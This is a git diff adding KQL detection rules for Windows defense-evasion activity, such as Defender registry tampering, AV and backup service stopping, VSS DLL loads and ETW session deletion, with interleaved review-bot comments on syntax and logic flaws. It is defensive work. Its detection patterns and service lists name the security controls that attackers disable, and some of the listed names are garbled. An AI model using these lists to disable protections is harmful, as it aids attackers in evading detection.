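Review bot: The description continuation `+Adversary might only use the ordinal number ...` is emitted without the `//` prefix, so the saved file fails to parse as KQL at that line; it should be `// Adversary might only use the ordinal number in order to bypass existing detection that alert on usage of ShellExec_RunDLL on CommandLine.` The query inspects `InitiatingProcessCommandLine` for `SHELL32.DLL` and the `#568`/`#570`/`#572`/`#576` ordinals but never requires `InitiatingProcessFolderPath endswith "\\rundll32.exe"`, so any parent whose command line merely contains those tokens (a script host echoing them, for instance) also satisfies the first conjunct; adding that parent-image check would tighten the rule without losing the intended rundll32 case, if upstream logic allows.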
diff --git a/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql b/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql
new file mode 100644
index 00000000..56279558
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_speech_runtime_binary_child_process.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious Speech Runtime Binary Child Process
+// Author: andrewdanis
+// Date: 2025-10-23
+// Level: high
+// Description: Detects suspicious Speech Runtime Binary Execution by monitoring its child processes.
+Child processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.lateral-movement, attack.t1021.003, attack.t1218
+// False Positives:
+// - Unlikely.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\SpeechRuntime.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql b/KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql
new file mode 100644
index 00000000..1050b6ad
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_splwow64_without_params.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Splwow64 Without Params
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects suspicious Splwow64.exe process without any command line parameters
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ProcessCommandLine endswith "splwow64.exe" and FolderPath endswith "\\splwow64.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql b/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql
new file mode 100644
index 00000000..75d606c8
--- /dev/null
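Review bot: `+Child processes spawned by SpeechRuntime.exe could indicate ...` is emitted without a `//` prefix, so this file is not valid KQL until that line becomes `// Child processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking.` Because the query is a single `InitiatingProcessFolderPath endswith "\\SpeechRuntime.exe"` with no exclusions, the `// - Unlikely.` false-positive note should be checked against real telemetry before this ships at `high`; a one-line caveat such as `// NOTE: no allow-list — tune on child FolderPath if benign children appear` would help the first tuner. The missing-`//` defect recurs across the converted rules with multi-line descriptions, so the fix belongs in the converter.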
+++ b/KQL/rules/Defense Evasion/suspicious_uninstall_of_windows_defender_feature_via_powershell.kql @@ -0,0 +1,11 @@ +// Title: Suspicious Uninstall of Windows Defender Feature via PowerShell +// Author: yxinmiracle +// Date: 2025-08-22 +// Level: high +// Description: Detects the use of PowerShell with Uninstall-WindowsFeature or Remove-WindowsFeature cmdlets to disable or remove the Windows Defender GUI feature, a common technique used by adversaries to evade defenses. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents +| where ProcessCommandLine contains "Windows-Defender" and (ProcessCommandLine contains "Uninstall-WindowsFeature" or ProcessCommandLine contains "Remove-WindowsFeature") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql b/KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql new file mode 100644 index 00000000..8ef21a2e --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_usage_of_shellexec_rundll.kql 
@@ -0,0 +1,10 @@ +// Title: Suspicious Usage Of ShellExec_RunDLL +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-01 +// Level: high +// Description: Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ProcessCommandLine contains "ShellExec_RunDLL" and (ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "comspec" or ProcessCommandLine contains "iex" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "odbcconf" or ProcessCommandLine contains "regsvr32") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql new file mode 100644 index 00000000..a7a9987a --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vss_ps_dll_load.kql 
@@ -0,0 +1,13 @@ +// Title: Suspicious Volume Shadow Copy VSS_PS.dll Load +// Author: Markus Neis, @markus_neis +// Date: 2021-07-07 +// Level: high +// Description: Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes. +It is often abused by attackers to delete or manipulate shadow copies, which can hinder forensic investigations and data recovery efforts. +The fact that it is loaded by processes that are not typically associated with VSS operations can indicate suspicious activity. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1490 + +DeviceImageLoadEvents +| where FolderPath endswith "\\vss_ps.dll" and (not((isnull(InitiatingProcessFolderPath) or ((InitiatingProcessFolderPath endswith "\\clussvc.exe" or InitiatingProcessFolderPath endswith "\\dismhost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\appcmd.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\iissetup.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe" or InitiatingProcessFolderPath endswith "\\srtasks.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\System32\\SystemPropertiesAdvanced.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\tiworker.exe" or InitiatingProcessFolderPath endswith "\\vssvc.exe" or InitiatingProcessFolderPath endswith "\\vssadmin.exe" or InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\") or 
(InitiatingProcessCommandLine contains "\\dismhost.exe {" and InitiatingProcessCommandLine startswith "C:\\$WinREAgent\\Scratch\\")))) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql new file mode 100644 index 00000000..6a7a594d --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Volume Shadow Copy Vssapi.dll Load +// Author: frack113 +// Date: 2022-10-31 +// Level: high +// Description: Detects the image load of VSS DLL by uncommon executables +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1490 + +DeviceImageLoadEvents +| where FolderPath endswith "\\vssapi.dll" and (not((isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))))) and (not(((InitiatingProcessFolderPath contains "\\temp\\is-" and InitiatingProcessFolderPath contains "\\avira_system_speedup.tmp") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\"))) \ No newline at end of file 
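Review bot: The two description continuations `+It is often abused by attackers to delete or manipulate shadow copies ...` and `+The fact that it is loaded by processes ...` carry no `//` prefix, so the vss_ps rule is a KQL syntax error as saved until both lines are commented (`// It is often abused ...`, `// The fact that ...`). On the allow-list, `InitiatingProcessFolderPath endswith "\\thor.exe"` and `"\\thor64.exe"` are only anchored to `startswith "C:\\Windows\\"`, so a dropped binary named thor.exe anywhere under that tree (e.g. `C:\\Windows\\Temp\\`) is exempted; that is inherited from upstream but deserves a comment such as `// NOTE: thor/thor64 exclusion is name-based under C:\Windows — consider pinning the exact install path` so tuners do not widen it further.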
diff --git a/KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql b/KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql new file mode 100644 index 00000000..aed0ddc8 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Vsls-Agent Command With AgentExtensionPath Load +// Author: bohops +// Date: 2022-10-30 +// Level: medium +// Description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - False positives depend on custom use of vsls-agent.exe + +DeviceProcessEvents +| where (ProcessCommandLine contains "--agentExtensionPath" and FolderPath endswith "\\vsls-agent.exe") and (not(ProcessCommandLine contains "Microsoft.VisualStudio.LiveShare.Agent.")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql b/KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql new file mode 100644 index 00000000..807e3a4e --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql 
@@ -0,0 +1,12 @@ +// Title: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE +// Author: frack113 +// Date: 2022-02-13 +// Level: medium +// Description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths" or ProcessCommandLine contains "SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Paths") and (ProcessCommandLine contains "ADD " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_DWORD " and ProcessCommandLine contains "/v " and ProcessCommandLine contains "/d " and ProcessCommandLine contains "0") and FolderPath endswith "\\reg.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql b/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql new file mode 100644 index 00000000..3e986e69 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql 
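Review bot: The final value test, `ProcessCommandLine contains "0"`, is satisfied by any command line containing a zero anywhere (a path like `Windows10`, a date, a GUID), so it adds nothing and the rule effectively fires on every `reg ADD ... Exclusions\\Paths ... REG_DWORD` regardless of the data written. The sibling tampering rule in the next hunk anchors its value as `"d 0"`; doing the same here, `ProcessCommandLine contains "/d 0"`, keeps the two rules consistent and removes the no-op. Exclusion-path values are, to my knowledge, always written as DWORD 0, so this should not drop true positives — worth confirming before tightening.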
@@ -0,0 +1,13 @@ +// Title: Suspicious Windows Defender Registry Key Tampering Via Reg.EXE +// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-03-22 +// Level: high +// Description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Rare legitimate use by administrators to test software (should always be investigated) + +DeviceProcessEvents +| where ((FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\")) and (((ProcessCommandLine contains "DisallowExploitProtectionOverride" or ProcessCommandLine contains "EnableControlledFolderAccess" or ProcessCommandLine contains "MpEnablePus" or ProcessCommandLine contains "PUAProtection" or ProcessCommandLine contains "SpynetReporting" or ProcessCommandLine contains "SubmitSamplesConsent" or ProcessCommandLine contains "TamperProtection") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 0")) or ((ProcessCommandLine contains "DisableAccess" or ProcessCommandLine contains "DisableAntiSpyware" or ProcessCommandLine contains "DisableAntiSpywareRealtimeProtection" or ProcessCommandLine contains "DisableAntiVirus" or ProcessCommandLine contains "DisableAntiVirusSignatures" or ProcessCommandLine contains "DisableArchiveScanning" or ProcessCommandLine contains "DisableBehaviorMonitoring" or ProcessCommandLine contains "DisableBlockAtFirstSeen" or ProcessCommandLine contains "DisableCloudProtection" or ProcessCommandLine 
contains "DisableConfig" or ProcessCommandLine contains "DisableEnhancedNotifications" or ProcessCommandLine contains "DisableIntrusionPreventionSystem" or ProcessCommandLine contains "DisableIOAVProtection" or ProcessCommandLine contains "DisableNetworkProtection" or ProcessCommandLine contains "DisableOnAccessProtection" or ProcessCommandLine contains "DisablePrivacyMode" or ProcessCommandLine contains "DisableRealtimeMonitoring" or ProcessCommandLine contains "DisableRoutinelyTakingAction" or ProcessCommandLine contains "DisableScanOnRealtimeEnable" or ProcessCommandLine contains "DisableScriptScanning" or ProcessCommandLine contains "DisableSecurityCenter" or ProcessCommandLine contains "Notification_Suppress" or ProcessCommandLine contains "SignatureDisableUpdateOnStartupWithoutEngine") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 1"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql b/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql new file mode 100644 index 00000000..6a22e04a --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql 
@@ -0,0 +1,13 @@ +// Title: Suspicious Windows Service Tampering +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 , X__Junior (Nextron Systems) +// Date: 2022-09-01 +// Level: high +// Description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1489, attack.t1562.001 +// False Positives: +// - Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry + +DeviceProcessEvents +| where (ProcessCommandLine contains "143Svc" or ProcessCommandLine contains "Acronis VSS Provider" or ProcessCommandLine contains "AcronisAgent" or ProcessCommandLine contains "AcrSch2Svc" or ProcessCommandLine contains "AdobeARMservice" or ProcessCommandLine contains "AHS Service" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "Apache4" or ProcessCommandLine contains "ARSM" or ProcessCommandLine contains "aswBcc" or ProcessCommandLine contains "AteraAgent" or ProcessCommandLine contains "Avast Business Console Client Antivirus Service" or ProcessCommandLine contains "avast! 
Antivirus" or ProcessCommandLine contains "AVG Antivirus" or ProcessCommandLine contains "avgAdminClient" or ProcessCommandLine contains "AvgAdminServer" or ProcessCommandLine contains "AVP1" or ProcessCommandLine contains "BackupExec" or ProcessCommandLine contains "bedbg" or ProcessCommandLine contains "BITS" or ProcessCommandLine contains "BrokerInfrastructure" or ProcessCommandLine contains "CASLicenceServer" or ProcessCommandLine contains "CASWebServer" or ProcessCommandLine contains "Client Agent 7.60" or ProcessCommandLine contains "Core Browsing Protection" or ProcessCommandLine contains "Core Mail Protection" or ProcessCommandLine contains "Core Scanning Server" or ProcessCommandLine contains "DCAgent" or ProcessCommandLine contains "dwmrcs" or ProcessCommandLine contains "EhttpSr" or ProcessCommandLine contains "ekrn" or ProcessCommandLine contains "Enterprise Client Service" or ProcessCommandLine contains "epag" or ProcessCommandLine contains "EPIntegrationService" or ProcessCommandLine contains "EPProtectedService" or ProcessCommandLine contains "EPRedline" or ProcessCommandLine contains "EPSecurityService" or ProcessCommandLine contains "EPUpdateService" or ProcessCommandLine contains "EraserSvc11710" or ProcessCommandLine contains "EsgShKernel" or ProcessCommandLine contains "ESHASRV" or ProcessCommandLine contains "FA_Scheduler" or ProcessCommandLine contains "FirebirdGuardianDefaultInstance" or ProcessCommandLine contains "FirebirdServerDefaultInstance" or ProcessCommandLine contains "FontCache3.0.0.0" or ProcessCommandLine contains "HealthTLService" or ProcessCommandLine contains "hmpalertsvc" or ProcessCommandLine contains "HMS" or ProcessCommandLine contains "HostControllerService" or ProcessCommandLine contains "hvdsvc" or ProcessCommandLine contains "IAStorDataMgrSvc" or ProcessCommandLine contains "IBMHPS" or ProcessCommandLine contains "ibmspsvc" or ProcessCommandLine contains "IISAdmin" or ProcessCommandLine contains "IMANSVC" or 
ProcessCommandLine contains "IMAP4Svc" or ProcessCommandLine contains "instance2" or ProcessCommandLine contains "KAVFS" or ProcessCommandLine contains "KAVFSGT" or ProcessCommandLine contains "kavfsslp" or ProcessCommandLine contains "KeyIso" or ProcessCommandLine contains "klbackupdisk" or ProcessCommandLine contains "klbackupflt" or ProcessCommandLine contains "klflt" or ProcessCommandLine contains "klhk" or ProcessCommandLine contains "KLIF" or ProcessCommandLine contains "klim6" or ProcessCommandLine contains "klkbdflt" or ProcessCommandLine contains "klmouflt" or ProcessCommandLine contains "klnagent" or ProcessCommandLine contains "klpd" or ProcessCommandLine contains "kltap" or ProcessCommandLine contains "KSDE1.0.0" or ProcessCommandLine contains "LogProcessorService" or ProcessCommandLine contains "M8EndpointAgent" or ProcessCommandLine contains "macmnsvc" or ProcessCommandLine contains "masvc" or ProcessCommandLine contains "MBAMService" or ProcessCommandLine contains "MBCloudEA" or ProcessCommandLine contains "MBEndpointAgent" or ProcessCommandLine contains "McAfeeDLPAgentService" or ProcessCommandLine contains "McAfeeEngineService" or ProcessCommandLine contains "MCAFEEEVENTPARSERSRV" or ProcessCommandLine contains "McAfeeFramework" or ProcessCommandLine contains "MCAFEETOMCATSRV530" or ProcessCommandLine contains "McShield" or ProcessCommandLine contains "McTaskManager" or ProcessCommandLine contains "mfefire" or ProcessCommandLine contains "mfemms" or ProcessCommandLine contains "mfevto" or ProcessCommandLine contains "mfevtp" or ProcessCommandLine contains "mfewc" or ProcessCommandLine contains "MMS" or ProcessCommandLine contains "mozyprobackup" or ProcessCommandLine contains "mpssvc" or ProcessCommandLine contains "MSComplianceAudit" or ProcessCommandLine contains "MSDTC" or ProcessCommandLine contains "MsDtsServer" or ProcessCommandLine contains "MSExchange" or ProcessCommandLine contains "msftesq1SPROO" or ProcessCommandLine contains 
"msftesql$PROD" or ProcessCommandLine contains "msftesql$SQLEXPRESS" or ProcessCommandLine contains "MSOLAP$SQL_2008" or ProcessCommandLine contains "MSOLAP$SYSTEM_BGC" or ProcessCommandLine contains "MSOLAP$TPS" or ProcessCommandLine contains "MSOLAP$TPSAMA" or ProcessCommandLine contains "MSOLAPSTPS" or ProcessCommandLine contains "MSOLAPSTPSAMA" or ProcessCommandLine contains "mssecflt" or ProcessCommandLine contains "MSSQ!I.SPROFXENGAGEMEHT" or ProcessCommandLine contains "MSSQ0SHAREPOINT" or ProcessCommandLine contains "MSSQ0SOPHOS" or ProcessCommandLine contains "MSSQL" or ProcessCommandLine contains "MSSQLFDLauncher$" or ProcessCommandLine contains "MySQL" or ProcessCommandLine contains "NanoServiceMain" or ProcessCommandLine contains "NetMsmqActivator" or ProcessCommandLine contains "NetPipeActivator" or ProcessCommandLine contains "netprofm" or ProcessCommandLine contains "NetTcpActivator" or ProcessCommandLine contains "NetTcpPortSharing" or ProcessCommandLine contains "ntrtscan" or ProcessCommandLine contains "nvspwmi" or ProcessCommandLine contains "ofcservice" or ProcessCommandLine contains "Online Protection System" or ProcessCommandLine contains "OracleClientCache80" or ProcessCommandLine contains "OracleDBConsole" or ProcessCommandLine contains "OracleMTSRecoveryService" or ProcessCommandLine contains "OracleOraDb11g_home1" or ProcessCommandLine contains "OracleService" or ProcessCommandLine contains "OracleVssWriter" or ProcessCommandLine contains "osppsvc" or ProcessCommandLine contains "PandaAetherAgent" or ProcessCommandLine contains "PccNTUpd" or ProcessCommandLine contains "PDVFSService" or ProcessCommandLine contains "POP3Svc" or ProcessCommandLine contains "postgresql-x64-9.4" or ProcessCommandLine contains "POVFSService" or ProcessCommandLine contains "PSUAService" or ProcessCommandLine contains "Quick Update Service" or ProcessCommandLine contains "RepairService" or ProcessCommandLine contains "ReportServer" or ProcessCommandLine contains 
"ReportServer$" or ProcessCommandLine contains "RESvc" or ProcessCommandLine contains "RpcEptMapper" or ProcessCommandLine contains "sacsvr" or ProcessCommandLine contains "SamSs" or ProcessCommandLine contains "SAVAdminService" or ProcessCommandLine contains "SAVService" or ProcessCommandLine contains "ScSecSvc" or ProcessCommandLine contains "SDRSVC" or ProcessCommandLine contains "SearchExchangeTracing" or ProcessCommandLine contains "sense" or ProcessCommandLine contains "SentinelAgent" or ProcessCommandLine contains "SentinelHelperService" or ProcessCommandLine contains "SepMasterService" or ProcessCommandLine contains "ShMonitor" or ProcessCommandLine contains "Smcinst" or ProcessCommandLine contains "SmcService" or ProcessCommandLine contains "SMTPSvc" or ProcessCommandLine contains "SNAC" or ProcessCommandLine contains "SntpService" or ProcessCommandLine contains "Sophos" or ProcessCommandLine contains "SQ1SafeOLRService" or ProcessCommandLine contains "SQL Backups" or ProcessCommandLine contains "SQL Server" or ProcessCommandLine contains "SQLAgent" or ProcessCommandLine contains "SQLANYs_Sage_FAS_Fixed_Assets" or ProcessCommandLine contains "SQLBrowser" or ProcessCommandLine contains "SQLsafe" or ProcessCommandLine contains "SQLSERVERAGENT" or ProcessCommandLine contains "SQLTELEMETRY" or ProcessCommandLine contains "SQLWriter" or ProcessCommandLine contains "SSISTELEMETRY130" or ProcessCommandLine contains "SstpSvc" or ProcessCommandLine contains "storflt" or ProcessCommandLine contains "svcGenericHost" or ProcessCommandLine contains "swc_service" or ProcessCommandLine contains "swi_filter" or ProcessCommandLine contains "swi_service" or ProcessCommandLine contains "swi_update" or ProcessCommandLine contains "Symantec" or ProcessCommandLine contains "sysmon" or ProcessCommandLine contains "TeamViewer" or ProcessCommandLine contains "Telemetryserver" or ProcessCommandLine contains "ThreatLockerService" or ProcessCommandLine contains "TMBMServer" or 
ProcessCommandLine contains "TmCCSF" or ProcessCommandLine contains "TmFilter" or ProcessCommandLine contains "TMiCRCScanService" or ProcessCommandLine contains "tmlisten" or ProcessCommandLine contains "TMLWCSService" or ProcessCommandLine contains "TmPfw" or ProcessCommandLine contains "TmPreFilter" or ProcessCommandLine contains "TmProxy" or ProcessCommandLine contains "TMSmartRelayService" or ProcessCommandLine contains "tmusa" or ProcessCommandLine contains "Tomcat" or ProcessCommandLine contains "Trend Micro Deep Security Manager" or ProcessCommandLine contains "TrueKey" or ProcessCommandLine contains "UFNet" or ProcessCommandLine contains "UI0Detect" or ProcessCommandLine contains "UniFi" or ProcessCommandLine contains "UTODetect" or ProcessCommandLine contains "vds" or ProcessCommandLine contains "Veeam" or ProcessCommandLine contains "VeeamDeploySvc" or ProcessCommandLine contains "Veritas System Recovery" or ProcessCommandLine contains "vmic" or ProcessCommandLine contains "VMTools" or ProcessCommandLine contains "vmvss" or ProcessCommandLine contains "VSApiNt" or ProcessCommandLine contains "VSS" or ProcessCommandLine contains "W3Svc" or ProcessCommandLine contains "wbengine" or ProcessCommandLine contains "WdNisSvc" or ProcessCommandLine contains "WeanClOudSve" or ProcessCommandLine contains "Weems JY" or ProcessCommandLine contains "WinDefend" or ProcessCommandLine contains "wmms" or ProcessCommandLine contains "wozyprobackup" or ProcessCommandLine contains "WPFFontCache_v0400" or ProcessCommandLine contains "WRSVC" or ProcessCommandLine contains "wsbexchange" or ProcessCommandLine contains "WSearch" or ProcessCommandLine contains "wscsvc" or ProcessCommandLine contains "Zoolz 2 Service") and ((ProcessCommandLine contains " delete " or ProcessCommandLine contains ".delete()" or ProcessCommandLine contains " pause " or ProcessCommandLine contains " stop " or ProcessCommandLine contains "Stop-Service " or ProcessCommandLine contains "Remove-Service ") or 
(ProcessCommandLine contains "config" and ProcessCommandLine contains "start=disabled")) and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe", "PowerShell_ISE.EXE", "PowerShell.EXE", "psservice.exe", "pwsh.dll", "sc.exe", "wmic.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\PowerShell_ISE.EXE" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\wmic.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql b/KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql new file mode 100644 index 00000000..3ca2bf94 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Windows Trace ETW Session Tamper Via Logman.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2021-02-11 +// Level: high +// Description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001, attack.t1070.001 +// False Positives: +// - Legitimate deactivation by administrative staff +// - Installer tools that disable services, e.g. before log collection agent installation + +DeviceProcessEvents +| where (ProcessCommandLine contains "stop " or ProcessCommandLine contains "delete ") and (FolderPath endswith "\\logman.exe" or ProcessVersionInfoOriginalFileName =~ "Logman.exe") and (ProcessCommandLine contains "Circular Kernel Context Logger" or ProcessCommandLine contains "EventLog-" or ProcessCommandLine contains "SYSMON TRACE" or ProcessCommandLine contains "SysmonDnsEtwSession") \ No newline at end of file 
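Review bot: Several entries in the service-name list look like OCR or transcription artefacts rather than service names — `msftesq1SPROO`, `MSSQ!I.SPROFXENGAGEMEHT`, `WeanClOudSve`, `Weems JY`, `wozyprobackup`, `UTODetect`, `SQ1SafeOLRService` — and can never match a real command line, so they only add length and review noise; check them against the upstream source and drop or correct them. Separately, very short tokens such as `"vds"`, `"VSS"`, `"HMS"`, `"MMS"` and `"BITS"` are tested with a case-insensitive `contains` against the whole command line, so a routine `net stop vss` or `sc stop bits` before a backup or update will fire at Level high; the false-positive note hints at this, but a `// NOTE:` on the `where` line naming these broad tokens, or a parent-process allowlist, would save the next tuner time.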
diff --git a/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql b/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql
new file mode 100644
index 00000000..001bb487
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql
@@ -0,0 +1,11 @@
+// Title: Suspicious Windows Update Agent Empty Cmdline
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-26
+// Level: high
+// Description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "Wuauclt" or ProcessCommandLine endswith "Wuauclt.exe") and (FolderPath endswith "\\Wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "Wuauclt.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql b/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql
new file mode 100644
index 00000000..092d7cfc
--- /dev/null
+++ b/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious Wordpad Outbound Connections
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-12
+// Level: medium
+// Description: Detects a network connection initiated by "wordpad.exe" over uncommon destination ports.
+This might indicate potential process injection activity from a beacon or similar mechanisms.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control
+// False Positives:
